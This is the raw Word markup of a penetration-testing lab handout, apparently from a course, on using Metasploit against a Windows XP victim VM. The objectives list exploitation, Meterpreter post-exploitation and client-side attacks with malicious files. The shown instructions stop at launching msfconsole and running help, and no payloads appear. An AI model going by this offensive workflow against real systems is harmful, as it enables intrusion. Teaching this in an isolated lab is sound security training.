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8E13" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Exploitation Using “Metasploit”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4158B4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5E624C35">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF4B726" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26230AC4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>What you need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960D2A7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00DC5D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>KALI Linux virtual machine (VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E1528" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00DC5D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A Windows XP SP3 / Windows Server 2003 VM on the same network as your Linux machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FE53C2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00DC5D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The instructions below assume you are using at least two virtual machines. You can do this in your own environment, or use the one provided for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0041B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00DC5D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Kali (threat actor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A6D5A" w14:textId="27633EDD" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00DC5D93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows XP / Windows Server 2003 (victim / target): </w:t>
      </w:r>
      <w:r w:rsidR="00BF482F">
        <w:t>&lt;REMOVED&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012051D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5B0732" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652FE4F3" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Part #1 – Metasploit Framework Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F2BAB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Part #2 – Exploiting a Windows XP Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB46D1" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Part #3 – Using Meterpreter for Post Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350897F8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Part #4 – Performing Client Side Attacks using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAC8FB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Attacking the victim with malicious content files (exe/pdf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BD0E64" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Attacking the  victim’s browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DDD790" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Part #5 – Using the Database under KALI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA382DC" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DFF9B4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000" w:rsidP="00C1364B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This lab is to add  on the knowledge gained in previous labs. This lab assumes you have at least basic knowledge on how to gather information from a remote box (machine) and about a remote service (if you have questions, please ask your instructor to explain). Once enough information is gathered the next step in the penetration testing process is to develop an attack plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B48AD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A01055" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729F4D8A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Starting the Virtual Machines (KALI, Windows XP, and Windows 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E9DF8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">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Start the Windows MSF Lab Virtual Machine (VICTIM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF103C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP = 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>( x is the number used for your IP address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110E78CF" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">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Start your KALI Virtual Machine (ATTACKER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D5AB7" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IP = 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE1432" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">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Login to KALI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9836D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">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Verify connectivity between the both VM using the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>” command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063CE75" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF41A85" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AA4D1D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A5D217C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DA649D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6252E1AE" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8B9CA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part #1 – Metasploit Framework Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC2B3D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit has a variety of interfaces as explained in the lectures, but for this lab we will be using the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” interface (check documentation for other interfaces).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1643871F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="37A38070" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a shell with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. It may take a while, depending on a number of factors, so be patient. It should look somewhat like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168309CE" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="7C1286DC" wp14:editId="6DCC9E8E">
            <wp:extent cx="5034013" cy="100102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034013" cy="1001027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BD165" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="123CD3F4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to run normal system commands from within the msf shell (try the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command, for instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429BFD53" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="5DEB9882" wp14:editId="324694DC">
            <wp:extent cx="2916455" cy="131866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16455" cy="1318661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75523024" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now I assume the first thing to do, is check the commands that the msf shell provides; this can be done using the command help:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0DD0DB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="A2C4C9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="A2C4C9"/>
        </w:rPr>
        <w:t xml:space="preserve">msf&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="A2C4C9"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46126475" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA4C2EE" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
